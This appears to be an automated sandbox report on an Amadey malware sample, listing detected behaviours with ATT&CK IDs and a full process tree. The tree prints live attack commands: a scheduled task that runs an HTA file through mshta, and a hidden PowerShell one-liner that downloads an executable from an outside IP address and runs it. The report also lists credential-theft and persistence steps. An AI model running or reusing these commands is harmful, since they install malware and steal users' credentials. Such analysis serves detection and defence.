amadey | 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ViGgA8C.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2432	powershell.exe
30	2648	powershell.exe
33	2508	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2720	powershell.exe
3056	powershell.exe
1164	powershell.exe
836	powershell.exe
2648	powershell.exe
2508	powershell.exe
2432	powershell.exe
2696	powershell.exe
3016	powershell.exe

Downloads MZ/PE file 6 IoCs

flow	pid	Process
28	1464	skotes.exe
4	2432	powershell.exe
33	2508	powershell.exe
7	1464	skotes.exe
7	1464	skotes.exe
7	1464	skotes.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ViGgA8C.exe

Executes dropped EXE 7 IoCs

pid	Process
1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
1464	skotes.exe
1788	Ryu8yUx.exe
2580	Ryu8yUx.exe
2340	UN8QxIq.exe
432	ViGgA8C.exe
2016	51621402d0.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	ViGgA8C.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE

Loads dropped DLL 15 IoCs

pid	Process
2432	powershell.exe
2432	powershell.exe
1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
1464	skotes.exe
1788	Ryu8yUx.exe
1340	WerFault.exe
1340	WerFault.exe
1340	WerFault.exe
1340	WerFault.exe
1340	WerFault.exe
1464	skotes.exe
1464	skotes.exe
1464	skotes.exe
1464	skotes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\51621402d0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1073899001\\51621402d0.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1073900021\\am_no.cmd"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	raw.githubusercontent.com
27	raw.githubusercontent.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00060000000195c5-254.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
1464	skotes.exe
432	ViGgA8C.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1788 set thread context of 2580	1788	Ryu8yUx.exe	43

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1340	1788	WerFault.exe	42

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViGgA8C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	51621402d0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2300	timeout.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	UN8QxIq.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	UN8QxIq.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	UN8QxIq.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1516	schtasks.exe
2336	schtasks.exe
1416	schtasks.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2432	powershell.exe
2432	powershell.exe
2432	powershell.exe
1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
1464	skotes.exe
1164	powershell.exe
2580	Ryu8yUx.exe
2580	Ryu8yUx.exe
2580	Ryu8yUx.exe
2580	Ryu8yUx.exe
2696	powershell.exe
3016	powershell.exe
432	ViGgA8C.exe
2648	powershell.exe
836	powershell.exe
2720	powershell.exe
3056	powershell.exe
432	ViGgA8C.exe
432	ViGgA8C.exe
2508	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	432	ViGgA8C.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
2016	51621402d0.exe
2016	51621402d0.exe
2016	51621402d0.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
2016	51621402d0.exe
2016	51621402d0.exe
2016	51621402d0.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 804 wrote to memory of 1552	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	31
PID 804 wrote to memory of 1552	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	31
PID 804 wrote to memory of 1552	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	31
PID 804 wrote to memory of 1552	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	31
PID 804 wrote to memory of 3032	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	32
PID 804 wrote to memory of 3032	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	32
PID 804 wrote to memory of 3032	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	32
PID 804 wrote to memory of 3032	804	234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe	32
PID 1552 wrote to memory of 1516	1552	cmd.exe	34
PID 1552 wrote to memory of 1516	1552	cmd.exe	34
PID 1552 wrote to memory of 1516	1552	cmd.exe	34
PID 1552 wrote to memory of 1516	1552	cmd.exe	34
PID 3032 wrote to memory of 2432	3032	mshta.exe	35
PID 3032 wrote to memory of 2432	3032	mshta.exe	35
PID 3032 wrote to memory of 2432	3032	mshta.exe	35
PID 3032 wrote to memory of 2432	3032	mshta.exe	35
PID 2432 wrote to memory of 1312	2432	powershell.exe	37
PID 2432 wrote to memory of 1312	2432	powershell.exe	37
PID 2432 wrote to memory of 1312	2432	powershell.exe	37
PID 2432 wrote to memory of 1312	2432	powershell.exe	37
PID 1312 wrote to memory of 1464	1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE	38
PID 1312 wrote to memory of 1464	1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE	38
PID 1312 wrote to memory of 1464	1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE	38
PID 1312 wrote to memory of 1464	1312	TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE	38
PID 1464 wrote to memory of 1164	1464	skotes.exe	40
PID 1464 wrote to memory of 1164	1464	skotes.exe	40
PID 1464 wrote to memory of 1164	1464	skotes.exe	40
PID 1464 wrote to memory of 1164	1464	skotes.exe	40
PID 1464 wrote to memory of 1788	1464	skotes.exe	42
PID 1464 wrote to memory of 1788	1464	skotes.exe	42
PID 1464 wrote to memory of 1788	1464	skotes.exe	42
PID 1464 wrote to memory of 1788	1464	skotes.exe	42
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 2580	1788	Ryu8yUx.exe	43
PID 1788 wrote to memory of 1340	1788	Ryu8yUx.exe	44
PID 1788 wrote to memory of 1340	1788	Ryu8yUx.exe	44
PID 1788 wrote to memory of 1340	1788	Ryu8yUx.exe	44
PID 1788 wrote to memory of 1340	1788	Ryu8yUx.exe	44
PID 1464 wrote to memory of 2340	1464	skotes.exe	46
PID 1464 wrote to memory of 2340	1464	skotes.exe	46
PID 1464 wrote to memory of 2340	1464	skotes.exe	46
PID 1464 wrote to memory of 2340	1464	skotes.exe	46
PID 2340 wrote to memory of 2904	2340	UN8QxIq.exe	48
PID 2340 wrote to memory of 2904	2340	UN8QxIq.exe	48
PID 2340 wrote to memory of 2904	2340	UN8QxIq.exe	48
PID 2340 wrote to memory of 2388	2340	UN8QxIq.exe	49
PID 2340 wrote to memory of 2388	2340	UN8QxIq.exe	49
PID 2340 wrote to memory of 2388	2340	UN8QxIq.exe	49
PID 2340 wrote to memory of 2892	2340	UN8QxIq.exe	50
PID 2340 wrote to memory of 2892	2340	UN8QxIq.exe	50
PID 2340 wrote to memory of 2892	2340	UN8QxIq.exe	50
PID 2340 wrote to memory of 3032	2340	UN8QxIq.exe	51
PID 2340 wrote to memory of 3032	2340	UN8QxIq.exe	51
PID 2340 wrote to memory of 3032	2340	UN8QxIq.exe	51
PID 2340 wrote to memory of 2956	2340	UN8QxIq.exe	52
PID 2340 wrote to memory of 2956	2340	UN8QxIq.exe	52

C:\Users\Admin\AppData\Local\Temp\234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
"C:\Users\Admin\AppData\Local\Temp\234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn pJid7mamalh /tr "mshta C:\Users\Admin\AppData\Local\Temp\4wm9nmNK9.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn pJid7mamalh /tr "mshta C:\Users\Admin\AppData\Local\Temp\4wm9nmNK9.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1516
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\4wm9nmNK9.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Users\Admin\AppData\Local\TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE
      "C:\Users\Admin\AppData\Local\TempLCSHVT1TQDGYGGZPTZKJUWEPR3ASNVKZ.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1312
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1464
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
      - C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 516
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:1340
      - C:\Users\Admin\AppData\Local\Temp\1073867001\UN8QxIq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073867001\UN8QxIq.exe"
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:2340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:3032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:1040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:1188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:1560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:2648
        
